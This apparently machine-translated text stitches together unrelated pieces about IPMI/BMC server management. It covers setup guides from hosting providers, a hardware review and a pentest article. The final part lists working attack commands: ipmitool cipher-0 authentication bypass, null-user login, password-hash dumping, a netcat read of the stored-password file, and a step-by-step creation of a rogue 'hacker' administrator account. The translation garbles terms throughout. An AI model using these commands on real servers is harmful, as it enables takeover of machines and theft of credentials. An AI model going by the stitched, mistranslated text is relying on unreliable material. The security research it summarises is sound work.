Hello everyone, today I’ll tell you what an IPMI management port is, how a system engineer can use it at work on a daily basis, simplifying his life to the point of disgrace.

IPMI ( Intelligent Platform Management Interface) is an interface for remote monitoring and management of the physical state of the server. IPMI is an analogue of the well-known IP-KVM developments, iLo,.

IPMI capabilities

• remote activation, shutdown and reboot of the server;
• monitoring of temperature, voltage and cooling system;
• remote connection to the storage media server (for example, to install OS and software);
• management of user accounts and rights (there is support for LDAP and);
• access port management and access protection SSL- certificate;
• setting up notifications about server operation.

How does the BMC controller work?

Let's look at the operation diagram of the BMC controller. And so Baseboard Management Controller is an interface for remote control and server health monitoring. In essence, Baseboard Management Controller is a single-chip system, as it is correctly called System-on-a-Chip, SoC. BMC has a built-in graphics core that accesses and interacts with the main components of the server hardware motherboard, through various interfaces necessary for the operation of the IPMI standard. What's good about IPMI is that it does not depend on the operating system of the host server. Personally, I use IPMI to flash the BIOS of servers and install the server operating system.

IPMI can also work behind NAT, for example in data centers; people are given the opportunity to manage their server this way, useful if it freezes. For NAT you will need to open the following ports:

• TCP 80: HTTP
• TCP 443: HTTPS
• TCP 5900, 5901: graphical console
• TCP 5120, 5123 - Virtual Media traffic
• UDP 623:IPMI

What does an IPMI port look like on servers?

Let me give you an example of how physical server SuperMicro looks like this control port. I have highlighted it with an arrow; most often it is located above USB ports.

Next, you need to configure everything, how to set up IPMI on Supermicro servers in the BIOS or through the ipmicfg utility, I already told you, I won’t stop there.

Default password on IPMI

The standard login and password for IPMI will be ADMIN / ADMIN, in capital letters.

You will see a page with summary information about the system, which you can see in the picture, it gives you an overview of the system, IP address, firmware version number, BIOS version, as well as a preview of the remote console. You can immediately turn on the server if it is not working. I used the IPMI interface many times to turn on the server after it was accidentally turned off.

On the hardware information screen, you can view different hardware components to see specifications, etc.

Using the Configuration section, you can perform a variety of tasks including alerts, RADIUS authentication, network configuration (for IPMI itself), SMTP configuration for alerts, IP access control, syslogs, etc.

The Remote Control section is one of the more interesting things, since you will most likely be interested in having remote access to the server if you are primarily accessing IPMI.

In chapter remote control(Remote Control), the power management menu allows you to:

• perform reset
• immediate power off
• gradual power off
• turning power on or off, all very handy if you're trying to remotely troubleshoot or power off and on a server.

The Launch SOL menu allows you to launch the SOL console.

Virtual Media is an amazing feature too. You can mount virtual media through a Windows share and present it as if it were plugged directly into the server. The only downside to IPMI is its 4.7 GB limit, which may not be enough for some new server OSes. VL copy Windows Server 2012 R2 weighs 5.1 GB, but this seems to be solved by updating the firmware.

To launch the remote control console in IPMI (Remote Console), click on the preview image, you should download a java file. The browser may complain about it, click "Keep" to confirm the download.

Introduction

Most Firstdedic servers are equipped with an IPMI module, but many users do not pay attention to this option.

IPMI is an acronym that stands for Intelligent Platform Management Interface and is translated into Russian as “intelligent platform management interface.”

What does it represent this device. This is a module that is located directly inside the server and an additional Ethernet connector is accessible to the outside.

In case of loss of control over the server, it is possible to go to the specified address and, after logging in, perform actions to resolve problems or obtain information about the problem that has arisen.

Basically, this module is used to monitor and control some functions built into the server hardware, such as monitoring temperature sensors, voltage sensors, power supply status, fan speed, logging, mounting images, etc. Please note that these features are available regardless of processor, operating system, or BIOS. Management is available even when the server is turned off.

Unfortunately, automating the provisioning of IPMI access to this moment failed, so access can be obtained by requesting technical support.

Upon request, an IP address is provided where the interface is located, as well as authorization data. Access is not full, limited to an Operator level account.

IPMI can be accessed either through a browser or using the IPMIView application. In the first case, you will need pre-installed Java and a browser plugin, in the second - Windows or MacOS, or pre-installed Java for the multi-platform version of IPMI View.

Access via browser

After authorization, the main page opens where you can access IP-KVM (a kind of virtual monitor that transmits a video image from the server to the connected client. It can be very useful if there is an error in setting up the network, installing the OS, or when blocking IP addresses on data center level), as well as see the current state of the server, turn on, turn off and hardware reboot the server (the Power On, Power Down and Reset buttons, respectively, in the Power Control via IPMI area).

Clicking the “Refresh Preview Image” button will refresh the preview of the virtual monitor. And when you click on the black screen itself, the IP-KVM JAVA client will open and you will have access to the interface of your operating system directly using the keyboard and mouse. But for it to work you will need JAVA installed and a browser plugin

In the Server Health tab of the main menu you can view the server status, get information about fan speed, temperature and voltage

Access via desktop application

In addition to the browser version, there is also a desktop version - IPMI View, which exists in versions for Windows, MacOS and Java. The latter is multi-platform.

All the latest versions of IPMI View, as well as documentation, are available on the manufacturer’s official ftp server - ftp://ftp.supermicro.com/utility/IPMIView/.

Unlike the browser version, which is downloaded and launched only after use, IPMI View is installed on a PC and, when working, simply connects to the required server.

Initially, you need to add all your servers to the application settings using the “Add a new system” button (File → New → System)

Where in the IPMI address field: you need to add the IP that you received when requesting access to IPMI from technical support.

To connect to an IPMI interface, after adding it to the IPMI Domain, simply double-click on the saved system.

After clicking on the “Login” button and successful authorization, the login window to the platform management interface will change slightly: Information about the version of the IPMI used will appear, and at the very bottom of the tab with available operations.

When you go to some tabs, you will notice how the application requests information from IPMI and displays it in a more accessible form.

For example, the Sensors tab will display data in graphical form, which is somewhat more visual than just numbers, as in the browser version.

The IPM Device tab will provide access to obtaining information about the server state and managing it: turning off, turning on, rebooting and resetting (Power Down, Power Up, Power Cycle, Reset, respectively).

To close the current session and disconnect from IPMI, select the menu item Session → Close .

All servers we offer for rent are equipped with an IPMI (Intelligent Platform Management Interface) controller, which allows you to enable, disable, remote connection (KVM) with the ability to mount ISO images, and also provides access to information about the current state of the server.

Using IPMI, after the server is issued, you can install the operating system and initial setup server. Since the IPMI controller is connected with a separate cable and has its own IP address, even if you lose access to the OS, you can always manage the server remotely without the need for direct physical access.

How to install the OS?

To install the operating system, you will need to connect to the IPMI server in one of the ways convenient for you: through the Web interface or using the IPMIView program. The article will describe both options, but we recommend using the second method.

Web interface

To connect via the web interface, you must address bar enter your IPMI address in your browser and log in. You can find the address and details for authorization in the letter with access to the server or in your personal account. Next you need to go to the Remote Control -> Console Redirection tab and click the Launch Console button.

In the Device 1 section, select ISO File in the Logical Drive Type drop-down list and specify the path to the image on your disk using the Open Image button, then connect the image with the Plug In button.

After connecting the image, reboot your server under Power Control ->

Some servers allow you to connect up to three devices using the Device 2 or Device 3 tabs in the Virtual Media -> Virtual Storage section. This may be useful if you need to install additional drivers during installation.

If you plan to install Windows OS on the server, the key combination Ctrl+Alt+Del can be passed in the Macro section - Macro.

Instructions for working with the web interface in older versions of IPMI firmware

IPMIView

To use the Supermicro IPMIView program, you need to download it from the official website, indicating your data, or directly from the ftp server: https://www.supermicro.com/wftp/utility/IPMIView/

After installing and running the program, you need to add your server in the File - New - System section.

For System Name, enter the name of your server, and in the IP address column, enter the IPMI address, which you can find in the letter with access to the server or in your personal account. Make sure there are no spaces at the end of the line in the address column and click OK.

In the list on the left, double-click on the name of the added server, after which you will see an authorization window. Fill it out using the details from the letter or personal account and click Login. If the connection is successful, you will see Connected, and additional tabs for managing the server will appear at the very bottom of the window.

To remotely manage the server, go to the KVM Console section and click the Launch KVM Console button.

Further actions are similar to working through

Using the IPMIView program, you can also reboot, enable or disable your server in the IPMI Device tab.

There are many technologies and products available to help network administrators maximize server uptime. Therefore, it was necessary that management standards be the same for everyone. Today the IPMI standard (interface intelligent control platform) is one of the most important open standards and is present on all Supermicro platforms.

Majority motherboards Supermicro contain a special slot that supports IPMI cards of the 2.0 standard (IPMI over LAN). IPMI technology makes it possible to remotely manage and restore a server regardless of its status and condition. Communication with the remote management console is provided using the built-in network controller, using additional bandwidth. This is a hardware solution that is independent of the operating system. IPMI 2.0 is a fast and inexpensive way to remotely manage, monitor, diagnose and restore a server.

Since IPMI is completely independent of the operating system, monitoring, management, diagnostics and system recovery can be carried out even when the OS is frozen or the server is offline. IPMI technology implements functions to display notifications about the need to restore components - this makes it possible to monitor the state of the system and respond to possible hardware problems before they occur. Probability similar problems The hardware monitoring feature also reduces this. In addition, you can monitor tampering with the server hardware if you configure the IPMI system to detect openings of the enclosure. Personnel security is ensured by the use of multi-level rights and passwords in conjunction with identification and linear encryption technologies. Some IPMI 2.0 modules support KVM-over-Lan. This makes it possible to remotely log into the operating system on the server and perform the necessary manipulations to configure it, or to install and remove the necessary programs.

IPMI is easy to use because it usually comes already integrated into a server or a separate device. And most importantly, it does not require financial expenses. And allows you to control the system at those moments when software are powerless - for example, when the OS freezes. Thus, IPMI technology and existing management tools and methods complement each other perfectly. And for effective server management it is necessary to use both software and hardware resources. -

Benefits of IPMI technology

• Remote control of power supplies, fans, voltage and temperature regardless of type and condition central processor and operating system
• Keeping a log of current events
• DOS support BIOS setup, Windows 2003, Linux
• Control of buttons on the body: Reset; Power down; Power up

Password protection

Altusen IP9001 and IPMI modules: embedded tools for remote computer management

Remote control modules, among which KVM switches are the most famous, are usually made in the form of external structures. But there is another class of devices, also designed for remote manipulation of server equipment, built directly into the controlled object. Every System Administrator cannot imagine his activities without using remote access to supervised servers, and in two versions: remote monitoring of equipment status and remote execution of administrative functions. Typically, these tasks are solved by accessing a text console or a graphical shell desktop. It is possible to organize remote control different ways, the most common of which are software tools. Almost every manufacturer of servers and storage systems includes software for remote status monitoring, notification of critical situations, and equipment administration.

Not least important are the built-in remote access tools provided by the OS, not counting individual third-party products. But sometimes software tools are powerless to help troubleshoot problems without direct access to the server. This happens, for example, during a hardware failure, and only a “cold” restart or even the need to turn off/on the power can correct the situation. In such cases, a specialized hardware and software solution comes to the rescue, which is a special controller installed on the motherboard. Its power is provided from a standby source or even autonomously. It can be accessed via a network interface; in addition, there may be another channel - through a standalone COM port or modem. Such a controller has access to sensors on the motherboard, and can also perform a hardware reset and turn the power on/off. These functions are managed from the administrator's workstation, on which a client is installed that interacts with the controllers and allows monitoring/control of a group of servers equipped with such modules.>

Altusen IP9001 The IP9001 controller is essentially a “computer within a computer.” This solution ensures complete hardware independence from the managed server. Access to the remote node is carried out via a Web interface and allows you to perform any operations with the computer being serviced, including turning on/off and hard reset The device is a PCI controller for remote control via the TCP/IP protocol, designed for installation in any computer equipped with the appropriate interface. In fact, IP9001 is an independent computer with its own IBM PowerPC 405GPr processor - a 400-MHz version of the already known 405GP, produced with clock frequencies 266 and 300 MHz. This processor includes an integrated PCI interface, SDRAM and Ethernet controllers. In addition to the required RAM and ROM, the board has its own ATI Rage XL graphics controller, and for connecting to the network it has an RJ-45 Ethernet port. Also worthy of attention is the possibility of working through telephone network using an additional modem module (RJ-11 connector) - it will help out if there is no access to the managed node via local network. In addition to the above, the remote control module is equipped with a decent set of peripheral interfaces, including RS-232 and USB hub 2.0. The device is powered in two ways - through PCI bus and an external source designed to provide independence from the managed computer. Control from a remote console provides the operator with the full range of capabilities available directly from the server itself, including working in Remote Console mode, monitoring system voltage and temperature, turning on/off, and rebooting. Support virtual disk, CD and floppy drives allow you to install updates, software and boot the OS from media physically located on the remote workstation. Software allows support for 64 accounts with differentiation of access rights to management for each operator. The device is designed to use operating Windows systems 2000/2003/XP, Red Hat versions 8.0 and higher. IPMI (Intelligent Platform Management Interface).

Another type of embedded device designed exclusively for server platforms is based on a set of IPMI specifications developed by a group of server hardware companies Intel, HP, NEC and Dell for remote monitoring/management tools. It included three specifications: Intelligent Platform Management Interface; Intelligent Platform Management Bus (IPMB) and Intelligent Chassis Management Bus (ICMB). IPMB is an internal interface specification for advanced monitoring/control within a single system, ICMB defines external interface specifications between IPMI-compatible systems.

IPMI extenders, despite their small size, provide full control over the server. After the release of version 1.0 in 1998, version 1.5 was released, and the 2.0 specification is currently relevant. This standard has already been supported by 171 equipment manufacturers, and the list continues to grow. Version 1.5 was approved in the first quarter of 2001. It already included the following features: means for monitoring temperatures, voltages, fan speeds, case tamper sensors; reset and power management; event logging; watchdog circuit (WatchDog Timer); access and notification via COM port and local network; specialized tires for monitoring. Version 2.0 was adopted in February 2004. It includes a number of additional features, such as Serial Over LAN, packet encryption, internal and external protocols, improved protection against unauthorized access, added extensions for monitoring modular structures (blade servers) and tools for creating virtual (management only) networks. Server motherboards on the Intel 7500 platform for Xeon Prestonia with a 400 MHz bus were equipped with IPMI. It was an SMC-0001 module, compatible with IPMI-1.5, designed as a small board with a specialized processor and its own COM port in a design similar to SO-DIMM memory modules. Almost all boards on the Intel 7520/7525/7320 platform, as well as Intel 7221 for Pentium 4 is equipped with the AOC-IPMI20-E module, which is already compatible with IPMI 2.0.

IPMI architecture version 2.0. Today this is the main standard adopted by server system developers

On server platforms 7230 for Pentium D and 1U platforms of the 6014P series for Xeon, a new design for IPMI cards has appeared. It has a connector similar to PCI-X x16, only with an “inverted” key. These boards (AOC-1UIPMI-B and AOC-LPIPMI-LANG) are functionally similar to the AOC-IPMI20-E, but are equipped with an additional Intel 82541PI Gigabit network card. The AOC-LPIPMI-LANG module is designed for installation in a regular or 2U case, and the AOC-1UIPMI-B is designed for installation in a 1U case and is not equipped with a network card (it is optionally available as a separate AOC-1UIPMI-LANG module). By default, AOC-IPMI20-E uses the first network controller available on the motherboard, and AOC-1UIPMI-B and AOC-LPIPMI-LANG use its additional one, if installed. When installed in the IPMI module, the Firmware corresponding to the motherboard is first programmed, and then the IP address is set. In the operating system the same LAN card can be used in parallel for other needs with an IP address different from that set for IPMI. As a rule, for security reasons it is recommended to allocate a separate network to the latter. To monitor/manage systems with IPMI adapters, a special utility IPMIView20 is used, which recognizes adapters of all versions. It allows you to find IPMI adapters in a given address range, and group the detected systems according to a certain criterion. To gain access to a specific server, it is necessary to pass password authentication, and IPMI 2.0 uses password control and encryption, as well as multi-level differentiation of access rights. Software for managing servers via IPMI provides the operator with not only a set of basic functions, but also monitoring data in a convenient graphical form The main monitoring/control capabilities provided by IPMI adapters, standards: logging system events, monitoring temperatures, voltages, fan speeds, and other sensors. It is possible to reboot, turn on/off and Cycle - sequentially turning off and then turning on the power. All these functions are available in two modes: Graceful Power Control - correct shutdown of the operating system through the agent installed on it (the GPC agent is available only for Windows and Linux), and Chassis Power Control - hardware reset/power off. Access to the text console is provided by reassigning it to a COM port and implementing SOL-redirection (Serial Over LAN). The latter allows you to access the text console remote server, and change remotely, for example, BIOS settings. In the same way you can access the bootloader Windows menu or to the Linux/UNIX text console.

Afterword

The devices described in the review are designed to perform the same task - to simplify the maintenance of remote systems as much as possible. The main difference between them is the scope of application. While Altusen IP9001 is suitable for any system, the installation of IPMI modules is limited exclusively to server platforms. Today, many development companies strive to include such modules as part of their systems. So, on June 15, ATEN International Co. Ltd. announced that its new IPMI firmware solution has been officially selected by Micro-Star International Co. Ltd. (MSI) for its server product line. MSI will integrate the ATEN firmware solution into its line of AMD servers to provide customers with the necessary server management functions. Separately, it is worth noting that Supermicro is preparing new AOC-SIMLP IPMI 2.0 monitoring/management tools for the Bensley platform, which will have built-in KVM Over LAN capabilities via IPMI .

The vast majority of modern servers have an IPMI/BMC interface for managing the server remotely. This tool represents access to virtual keyboard and the server screen via the TCP/IP protocol. Today we will touch on the history of IPMI security research, consider vectors for carrying out attacks and their further development using IPMI.

IPMI is a set of specifications that govern how to communicate and what to provide.
All vendors try to adhere to these specifications.
Navy is a hardware wrapper for IPMI operation. It is a single-board computer (system on a chip) with tentacles in the main sensors. Each vendor chooses what kind of hardware to use and how to combine it, which is natural. We will consider all our examples using integrated Lights Out (iLO) from Hewlett-Packard (HP). HP iLO is just a BMC/IPMI combination. Other vendors have their own names, implementations in hardware and software. But, as a rule, this is a single board computer with ARM processor and Linux on board.
The main function of such devices is to make the life of administrators simpler and more convenient: there is no need to run to the server and press the Reset button new system/ see why it won't load. Now you can connect to IPMl/BMC and do all this remotely. In addition, it becomes possible to receive information from various temperature sensors,
voltage and so on, which is also quite convenient.

CONTROL

There are several control interfaces:
- web interface (depending on the vendor);
- IPMI over LAN (UDP 623);
- from installed system on the server (provided that drivers from the manufacturer are installed). Software used: WMI for Windows, OpenlPMI, IPMltool for Linux.

Everything is clear with the web interface. Each vendor decides for himself what it looks like and how to implement it. The second and third interfaces are similar, but the transmission medium is different. In the case of IPMI over LAN, as you might guess, commands are sent over the network to UDP port 623. From the installed system, commands for IPMI are sent through a device file, usually /dev/ipm iO, which appears after installing the driver. The standard utility for interacting with IPMI is IPMltool for GNU/Linux, as it is the easiest to use.

WHAT TO PENTESTER IPMl/BMC

Despite the fact that the report on IPMl/BMC vulnerabilities was published in the summer of 2013, there are currently many vulnerable systems remaining. Very often IPMl/BMC of any stripe can be found through a search engine. Naturally, you should not keep such systems outside. They are mainly encountered during internal pentests. One of the simplest attack vectors using such systems is “hijacking” a server using IPMI/BMC.

Once you have administrative access to IPMl/BMC (as will be shown below, this is not at all difficult), you can connect via VirtualConsole (aka KVM) and, for example, reset the root password or use LiveCD to dump the hash and local users if it's Windows. With a pumped-up luck skill, you can even catch a console from which root forgot to log out (this happens very often on virtual machines). In turn, IPMI can also be used as an opportunity to regain access to the server after a complete reinstallation of the system.
Access to IPMI/BMC using the operating system with maximum privileges is possible without using a password, that is, authorization is not needed at all. In this case, the attacker simply creates an administrative IPMl/BMC account. If he loses access to the server, he goes to IPMl/BMC and returns his honestly earned goods. In general, the connection between IPMl/BMC and the main computer has not yet been thoroughly studied. This is an unplowed field for finding bugs and features. Considering the number of vendors who implement this in their servers, we can talk about a “rich internal world”.

PUBLIC RESEARCH

Dan Farmer was the first to draw attention to the security of IPMI and the IUD. With his full report, aptly titled Freight Train to Hell. We will look at the most interesting points from a hacking point of view.
Based on Dan's research, IPMl/BMC vulnerabilities can be divided into two broad categories:

· custom bugs from manufacturers (for example, web interface vulnerabilities);
· IPMI protocol vulnerabilities.

In fact, Dan dug up a lot of interesting things, more on that below.

NULL authentication

Description
The vulnerability allows you to bypass authentication. Present only in IPMI 1.5. Operation makes it possible to manage the device by simply activating the option to disable authentication. Privileges vary between vendors, but are usually maximum.

Vendors
- HP
- Dell
- Supermicro.

Conditions
Open port UDP 623, IPMI 1.5, login of an existing user.

Ipmtiool -A NONE -H targetIP bmc guid

IPMI Authentication Bypass via Cipher 0

Description
The vulnerability allows you to bypass authentication. The bug appeared with IPM version I
2.0. In this revision we decided to add encryption. To operate you need
know the login is valid account, but you don’t need to know the password -
you can specify any.

Vendors
- HP
- Dell
- Supermicro.

Conditions

Open port UDP 623, IPMI 2.0, login of an existing user.

Metasploit - auxiliary/scanner/ipmi/ipmi_cipher_zero ipmitool -I lanplus -C 0 -H targetIP -u Administrator -P anypasswordhere user list

IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval

Description
The vulnerability allows an unauthorized user to obtain hashed user passwords for subsequent brute force. The bug appeared in the IPMI specification version 2.0

Vendors
- HP
- Dell;
- Supermicro.

CONDITIONS

Open port UDP 623, IPMI 2.0 and valid user-logins.

Metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes http://fish2.com/ipmi/tools/rak-the-ripper.pl

IPMI Anonymous Authentication / Null user

Description
Some call it null user, others call it anonymous authentication. Some share these two vulnerabilities, others do not. By default there is null user/anonymous - "" (empty string). If they say null user, then his password is also empty. If they say anonymous authentication, then his pass is admin and it’s all IPMI Chips with ATEN-Software’s fault.
Dan, in his research, considers these to be two different vulnerabilities. And in the doc from Rapid7 there is no longer a word about null user.

Vendors:

HP
Dell
Supermicro (use IPMI Chips with ATEN-Software).

Conditions

Open UDP port 623.

Metasploit - auxiliary/scanner/ipmi/ipmi_dumphashes ipmitool -I lanplus -H targetIP -U "" -P "" user list

Supermicro IPMI UPnP Vulnerabllity

Description
Supermicro has a UPnP SSDP service on UDP port 1900. It is vulnerable to a buffer overflow.

Vendors
Supermicro.

Conditions
Open port 1900.

Metasploit exploit/multi/upnp/libupnp _ssdp_overflow metasploit auxiliary/scanner/upnp/ssdp_msearch

Supermicro IPMI Clear-text Passwords

Description
The IPMI 2.0 specification implies that cleartext passwords must be stored somewhere. In Supermicro they are located in the /nv/PSBlock or /nv/PSStore files, depending on the firmware.
In addition, in the Navy implementations on the Nuvoton WPCM450, on TCP port 49152 there is a service that allows you to read the contents of files in the /nv directory, for example PSBlock, server.pem, and so on.

Vendors
· Supermicro.

Conditions
Shell access

Cat /nv/PSBlock echo (GET /PSBlock" 1 nc targetIP 49152

Regarding the vulnerabilities “NULL authentication / IPMI Authentication Bypass via Cipher O”, “IPMI 2.0 RAKP Authentication Remote Password Hash Retrieval”, “IPMI Anonymous Authentication” - all this is written in the IPMI specification.
Researchers have thoroughly studied it, focusing on authentication and encryption mechanisms. An arbitrary code execution vulnerability in the UPnP service in Supermicro firmware (Supermicro IPMI UPnP Vulnerability) refers to CVE-2012-5958 (BoF in libupnp). The rest of the vulnerabilities we touched upon were found by analyzing the Supermicro firmware for Supermicro X9 motherboards, and the emphasis was placed specifically on analyzing the code responsible for the web.

HANDS-ON LAB

Let's look at the standard scheme for exploiting IPMI vulnerabilities.
Using the ipmi_version module, available in the well-known Metasploit framework, you can scan the network perimeter. If you are already in the internal segment and there is no way to install/use Metasploit, then you can get by with the simple ipmiping or rmcpping utility.
Once you have discovered open IPMIs, you should first check them for the “Authentication Bypass via Cipher O” vulnerability (see above). If it is present, then you can do without dumping user hashes and simply reset the administrator’s password or add your own. Important: to exploit this vulnerability, you must know the logs on your account; in our case, the account must have administrative privileges. First, let's consider the case of a user hash dump and subsequent brute force.

Using the Metasploit module ipmi_dumphashes we have the ability to collect user hashes. Important: without knowing the user’s login, it will not be possible to obtain his hash. In options ipmi_dumphashes you can specify the path to the file with logins, for example, if administrators have created accounts for themselves. The default file contains the default logins of all vendors. Brute hashes are supported as oclHashcat, and John the Ripper with jumbo-patches (community edition). John should be taken from Github, since on the official website outdated version without support for the format we need. Latest version oclHashcat, currently 1.30, supports everything out of the box.

If you have a hash from HP ilO4 in your hands, then you are lucky. The fact is that when configured at the factory, the default password for the Administrator account is set to eight characters long - uppercase + numeric. Using my modest resources, searching for such a value takes about half an hour.

If there is a vulnerability cipher About You can do without brute force hashes and reset your password. To do this, we need the IPMitool utility. Building for GNU/Linux does not raise any questions. But under Windows you will have to dance with a tambourine in Cygwin. The sequence of actions for adding an administrator is as follows:

1. We look at which users are present and use the next free ID.

Ipmitool -I lanplus -с 0 -H 1.1.1.1 -U Administrator -Р anypasswordhere user list

2. Set our user’s login.

Ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Administrator -P anypasswordhere user set name hacker

3. Set a password for it.

Ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Administrator -P anypasswordhere user set password hackerpass

4. Make him an administrator.

Ipmitool -I lanplus -С 0 -Н 1.1.1.1 -U Administrator -Р anypasswordhere user priv 4

5. Activate the newly created account.

Ipmitool -I lanplus -C 0 -H 1.1.1.1 -U Administrator -P anypasswordhere user enabled

After the hashes are cracked, passwords are reset, or a new administrator is added, you have the opportunity to log in through the web interface, via SSH to SMASH, or connect to a remote desktop, a la KVM.
The KVM switch is of particular value, as it provides access directly to the console itself, thereby allowing you to access the BIOS, install the operating system, and the like. For implementation KVM switch Each vendor is responsible. For example, in HP
ilO4 uses TCP ports 17988 and 17990 for this. Dell iDRAC7 uses TCP port 5900. Cisco ICM TCP port 2068.

It is worth mentioning such a thing as HP BladeSystem Onboard Administrator. HP BladeSystem is a chassis to which blade servers are connected. So, this chassis allows you to centrally manage blade servers using IPMI. In this case, authorization for “Slave” IPMI occurs using the SSO mechanism. All you need is to get the hash of a user with administrative privileges and use the web interface to connect to the server you are interested in.

Another interesting feature found in HP il04 is the ability to connect to the server via KVM directly from SMASH (read: SSH) using the TEXTCONS command. This is quite useful when ports 80, 443, 17990 are closed. You will need administrator rights to do this, but who cares?
Becoming an administrator is not that difficult. Personally for you, reader, I have prepared the ipmicd program in C for Windows/Linux. It allows you to scan a range of addresses for the presence of IPMl/BMC, as well as dump hashes (analogous to ipmi_dumphashes from Metasploit). The programs were created for cases when using Metasploit is not the best idea, for example, IPMl/BMC are located somewhere far away where Metasploit cannot be forwarded.

The utility is available on GitHub. Very easy to use:

1. The -p parameter is used when it is necessary to scan a specific range.
2. The -d parameter specifies whether to obtain the hashed password.
3. The -v N parameter indicates the degree of logging during operation, 0..5. When N = 1, the program produces fingerprints.

By combining various parameters, you can influence the behavior of the program. For example, when using the -d and -p options together, the program will try to obtain hashes only from those systems that respond to IPMl pings. Using only the -d option will try to get hashes from all addresses, which is usually incredibly slow. If something is in doubt, you can use the -v 5 option - the program will display received messages in a convenient format. To compile under Linux, you only need GCC - gcc ipmicd.c -static -o ipmicd. If used on Windows, compile using MinGW gcc ipmicd.c -mno-ms-bitfields -lws2_32 -DMINGW.

CONCLUSION

A few words about the high: the study of capabilities and implementations by different IPMl/BMC vendors is just beginning. This can include not only web interfaces or SMASH, but also drivers for operating systems, allowing you to interact with technologies for remote management of the IPMI/BMC server from the installed system. Internal services that implement information exchange in IPMl/BMC. Even the “hardware” implementation of the Navy itself and how exactly it controls the main server can be targeted. I recommend that administrators check all their systems for public vulnerabilities and, if possible, eliminate these vulnerabilities. The most important recommendation that I would like to give to the reader is to pay maximum attention to the settings of the equipment you control.